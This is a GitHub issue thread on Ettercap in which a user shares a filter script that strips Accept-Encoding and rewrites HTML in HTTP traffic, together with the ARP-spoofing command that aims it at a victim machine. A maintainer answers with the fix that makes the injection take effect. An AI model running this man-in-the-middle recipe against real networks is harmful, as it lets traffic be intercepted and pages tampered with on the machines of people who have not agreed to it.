### ISSUE TITLE
Does js injection with filter still work now?

### ISSUE THREAD

**Issue by kdlsw** [Ettercap/ettercap#796]
All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now?
Anyway, this is my filter script

`if (ip.proto == TCP && tcp.dst == 80) { `
 `   if (search(DATA.data, "Accept-Encoding")) {`
`        replace("Accept-Encoding", "Accept-Nothing!"); `
`       msg("zapped Accept-Encoding!\n");`
`    }   `
`}`

`if (ip.proto == TCP && tcp.dst == 80) {`
`     if (search(DATA.data, "<head>")) {`
`        replace("<head>", "<HEAD>"); `
`        msg("Code injected");`
`    }`
`}`

And I run it as `ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//`
test.ef is the compiled filter file.

When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code file is untouched. The part I really don't understand is, if I remove the search condition,
`if (ip.proto == TCP && tcp.dst == 80) {
        replace("<head>", "<HEAD>"); 
        msg("Code injected");
    }
}`
"Code injected" shows, but html is not touched, which means, the problem is that the filter cannot find any named strings (in this case `<head>`) in the html file, it can only deal with the header (Accept-Encoding). Is there a known answer for that? And, any solutions please? Thank you!

**Comment by koeppea** [comment]
Well HTML code is typically a response of a webserver, hence these types of packets where the webserver responds. Then the port number 80 is the source port of that packet.
So the second condition should rather look like:
```
if (ip.proto == TCP && tcp.src == 80) {
...
```

Clear?
